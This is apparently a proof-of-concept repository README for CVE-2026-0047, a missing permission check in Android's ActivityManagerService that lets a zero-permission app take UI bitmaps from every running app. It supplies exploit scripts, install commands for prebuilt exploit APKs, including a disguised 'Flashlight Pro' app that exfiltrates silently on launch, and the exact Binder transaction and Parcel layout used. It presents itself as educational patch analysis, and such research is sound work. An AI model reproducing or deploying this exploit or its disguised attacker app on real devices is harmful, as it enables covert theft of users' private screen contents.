Share
## https://sploitus.com/exploit?id=C3E9251E-4FF9-59FD-AE92-266794E6812A
# CVE-2026-0047: Missing Permission Check in ActivityManagerService

**Heap of bitmaps stolen from every running app โ€” zero permissions, zero user interaction.**

A missing `enforceCallingOrSelfPermission(DUMP)` check in `ActivityManagerService.dumpBitmapsProto()` allows any installed app to exfiltrate UI bitmaps from all running processes on Android 16 QPR2 Beta (Baklava).

> **Note:** We did not discover this vulnerability. All credit for finding and responsibly reporting goes to the original researchers. This repository contains our independent **patch analysis, reproduction, and educational writeup** to help the security community understand the bug class and exploitation techniques involved.

| | |
|---|---|
| **CVE** | CVE-2026-0047 |
| **Severity** | Critical โ€” CVSS 8.4 |
| **Component** | `ActivityManagerService.dumpBitmapsProto()` |
| **Root Cause** | Missing permission check (CWE-280) |
| **Impact** | Any zero-permission app steals UI bitmaps from all running apps |
| **Affected** | Android 16 QPR2 Beta 1โ€“3 (Baklava), patch level < 2026-03-01 |
| **Patched** | [March 2026 Android Security Bulletin](https://source.android.com/docs/security/bulletin/2026/2026-03-01) |

## Repository Contents

```
โ”œโ”€โ”€ app/                    # PoC exploit app (audit tool UI)
โ”œโ”€โ”€ attacker/               # "Flashlight Pro" โ€” disguised attacker app
โ”œโ”€โ”€ apk/                    # Pre-built APKs (ready to install)
โ”‚   โ”œโ”€โ”€ cve-2026-0047-poc.apk
โ”‚   โ””โ”€โ”€ flashlight-pro-attacker.apk
โ”œโ”€โ”€ exploit.sh              # Single-shot exploit script
โ”œโ”€โ”€ gradle/                 # Gradle wrapper
โ””โ”€โ”€ README.md
```

## Setting Up the Test Environment

You need an Android 16 QPR2 Beta (Baklava) emulator with a security patch level before `2026-03-01`:

```bash
# Download the vulnerable system image
sdkmanager "system-images;android-Baklava;google_apis;arm64-v8a"

# Create an AVD
avdmanager create avd -n baklava -k "system-images;android-Baklava;google_apis;arm64-v8a"

# Boot the emulator
emulator -avd baklava &

# Verify the patch level is pre-fix
adb shell getprop ro.build.version.security_patch
# Anything before 2026-03-01 is vulnerable
```

## Quick Start

### Option 1: Single-shot script (recommended)

```bash
# Full run: set up emulator, build, exploit, extract stolen bitmaps
./exploit.sh --setup-emulator

# Already have a Baklava emulator running?
./exploit.sh

# Skip build, just run exploit
./exploit.sh --skip-build
```

### Option 2: Pre-built APK

```bash
# Install the PoC app
adb install apk/cve-2026-0047-poc.apk

# Open some apps (Settings, email, etc.) to have visible UI
adb shell am start -n com.android.settings/.Settings

# Launch the PoC
adb shell am start -n com.poc.cve20260047/.MainActivity

# Tap "Exploit dumpBitmapsProto()" button
```

### Option 3: Attacker simulation ("Flashlight Pro")

```bash
# Install the disguised attacker app โ€” declares ZERO permissions
adb install apk/flashlight-pro-attacker.apk

# Launch it โ€” exfiltration happens silently on startup
adb shell am start -n com.poc.cve20260047.attacker/.MainActivity
```

## How It Works

1. **Raw Binder probe** โ€” Transaction code `#117` on the `activity` service maps to `dumpBitmapsProto()`. Sending it without arguments causes a `NullPointerException` inside AMS (not a `SecurityException`), proving the method body executes without any permission check.

2. **Raw Binder exploit** โ€” We use `IBinder.transact()` to send a hand-crafted Parcel directly to AMS. This bypasses Android's hidden API restrictions entirely โ€” no `hidden_api_policy` setting needed. The Parcel contains:
   - Interface token (`android.app.IActivityManager`)
   - Non-null marker + `ParcelFileDescriptor` (pipe write end)
   - Empty string array (all processes)
   - `userId = -2` (`USER_CURRENT`)
   - `dumpAll = true`
   - `format = "png"`

3. **Bitmap extraction** โ€” AMS writes protobuf data containing PNG bitmaps to the pipe. We scan for PNG magic bytes (`89 50 4E 47`) and IEND trailers to extract individual images.

### Result

On a Baklava emulator (`BP41.250725.007`, patch `2025-08-05`) with Settings, Clock, and Files open:

- **679,091 bytes** of protobuf data
- **63 valid PNG images** stolen from all running apps
- **Zero permissions** declared by the PoC app

## How It Was Fixed

Google added `enforceCallingOrSelfPermission(DUMP)` as the first line of `dumpBitmapsProto()`, so unprivileged callers now get a `SecurityException` before any data is accessed.

## References

- [Android Security Bulletin โ€” March 2026](https://source.android.com/docs/security/bulletin/2026/2026-03-01)
- [CVE-2026-0047 โ€” NVD](https://nvd.nist.gov/vuln/detail/CVE-2026-0047)
- [CWE-280: Improper Handling of Insufficient Permissions](https://cwe.mitre.org/data/definitions/280.html)
- [Blog post: Full analysis and exploitation walkthrough](https://www.mobilehackingcourse.com/cve-2026-0047-activitymanager-eop/)

## Credits

Research and PoC by [Mobile Hacking Lab](https://www.mobilehackinglab.com). We reproduced this vulnerability independently for educational purposes.

## Disclaimer

This proof of concept is provided for **educational and authorized security research purposes only**. Only use it on devices and environments you own or have explicit permission to test. The authors are not responsible for any misuse.